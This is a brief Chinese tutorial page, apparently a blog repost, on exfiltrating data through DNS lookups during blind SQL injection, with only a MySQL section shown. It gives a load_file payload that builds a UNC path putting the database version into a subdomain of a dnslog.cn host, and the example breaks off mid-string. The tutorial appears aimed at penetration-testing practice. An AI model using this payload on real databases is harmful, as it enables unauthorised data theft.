本文主要是介绍26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
环境准备:SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?-CSDN博客
构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客
一、MySQL
在 MySQL 数据库管理系统中,可以利用 load_file
函数来执行文件读取操作,并通过注入恶意代码来触发 DNS 解析以传输数据到 DNSLog 平台。以下是针对 Windows 操作系统中 MySQL 的示例:
-
需要设置
secure_file_priv
为空:- 这个条件要求将 MySQL 的
secure_file_priv
参数设置为空,以允许load_file
函数加载任意文件。
- 这个条件要求将 MySQL 的
-
使用
load_file
函数注入恶意代码:- 示例代码:
# ti2dw9.dnslog.cn 改成自己的dnslog二级域名, version() 获取 数据库版本信息 select load_file(concat('\\\\',(select version()),'.ti2dw9.dnslog.cn\\tes
- 示例代码:
这篇关于26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!